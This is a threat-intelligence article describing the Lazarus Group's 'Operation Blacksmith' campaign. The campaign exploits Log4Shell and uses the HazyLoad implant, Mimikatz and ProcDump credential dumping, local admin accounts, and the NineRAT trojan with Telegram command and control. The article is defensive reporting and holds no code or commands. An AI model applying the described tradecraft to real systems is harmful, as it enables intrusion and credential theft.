The threat actor known as the Lazarus Group has recently been identified in a series of attacks dubbed ‘Operation Blacksmith,’ where they have been observed targeting the Log4Shell vulnerability (CVE-2021-44228). This campaign involves the opportunistic targeting of enterprises worldwide that publicly host and expose their vulnerable infrastructure, specifically for n-day vulnerability exploitation. This article delves into the details of Lazarus Group’s operation, their tactics, and the implications for targeted sectors.
Operation Blacksmith: A New Campaign
Lazarus Group’s ‘Operation Blacksmith’ marks a significant evolution in their attack strategies. This campaign serves their relentless pursuit of compromising enterprises with vulnerable infrastructure. By targeting organizations globally, Lazarus aims to exploit the Log4Shell vulnerability and gain unauthorized access to critical systems. The campaign’s global reach raises concerns about the security protocols of various enterprises.
Targeted sectors
Lazarus Group, known for its sophisticated cyber operations, has shifted its focus to target specific sectors in ‘Operation Blacksmith.’ Companies operating in the manufacturing, agricultural, and physical security sectors have been observed as primary targets. The implications of such targeted attacks on these industries are far-reaching, highlighting the increasing vulnerability and potential impact of malicious actors on critical sectors.
Extensive reconnaissance
In this campaign, the Lazarus Group has displayed a keen interest in gathering extensive system information before launching their attacks. They employ various commands and query techniques to engage in extensive reconnaissance and learn about the target environment. By querying event logs and conducting OS credential dumping, Lazarus ensures that they have a thorough understanding of the targeted infrastructure’s strengths and weaknesses.
Custom-Made Implant: HazyLoad
The Lazarus Group employs a custom-made implant called HazyLoad, which plays a crucial role in establishing direct access to compromised systems. Functioning as a proxy tool, HazyLoad enables the threat actors to establish a secure and persistent connection with the compromised infrastructure. This implant serves as a covert means to enable unauthorized access and potentially conduct further malicious activities within the target network.
Change in Tactics: Local User Account
The Lazarus Group deviates from its usual tactics in ‘Operation Blacksmith’ by creating a local user account with administrative privileges instead of using unauthorized domain-level accounts. This tactical change indicates that the threat actors aim to blend in with legitimate users, making it more challenging to detect their presence. The utilization of local user accounts enhances their stealth and allows them to carry out their activities without arousing suspicion.
Shift in Hands-On-Keyboard Phase
In addition to altering their account creation tactics, the Lazarus Group has also shifted their tactics during the hands-on-keyboard phase of the attack. They now download and use credential dumping utilities such as ProcDump and Mimikatz. By using these tools, the threat actors can extract valuable login credentials, allowing them to escalate privileges and gain deeper access to the compromised systems. This shift in tactics demonstrates the constant evolution and adaptability of the Lazarus Group’s methods.
Introduction of NineRAT
The second phase of ‘Operation Blacksmith’ reveals the deployment of a previously unknown Remote Access Trojan (RAT) named ‘NineRAT.’ This sophisticated malware provides the Lazarus Group with enhanced capabilities to manipulate and control compromised systems. Noteworthy is the RAT’s integration with the Telegram-based C2 channel, where preliminary commands are received to fingerprint infected systems. This advancement showcases the group’s increasing reliance on unconventional communication channels.
Utilization of Telegram-based C2 channel
The integration of a Telegram-based command and control (C2) channel by the Lazarus Group highlights their adaptation to modern communication platforms. By utilizing Telegram, the threat actors disperse preliminary commands to fingerprint infected systems, ensuring a more efficient and targeted approach. This underscores the importance of monitoring and detecting malicious activities on diverse communication channels for effective threat mitigation.
Self-Uninstallation Capability
NineRAT stands out with its unique capability to uninstall itself from the compromised system using a BAT file. This feature adds an additional layer of complexity for identifying and mitigating the presence of the RAT. The self-uninstallation capability makes it difficult for security teams to track and analyze the full scope of the attack and reinforces the need for comprehensive security measures to proactively detect these threats.
Lazarus Group’s ‘Operation Blacksmith’, targeting the Log4Shell vulnerability, poses a significant threat to enterprises worldwide. The campaign’s continued exploitation of vulnerable infrastructure and specific targeting of key sectors highlights the importance of robust security measures. It is crucial for organizations to promptly patch vulnerabilities, conduct regular security assessments, and deploy effective monitoring and response mechanisms to detect and mitigate evolving threats. By staying vigilant and proactive, enterprises can enhance their resilience against such sophisticated attacks and protect their critical systems and sensitive data.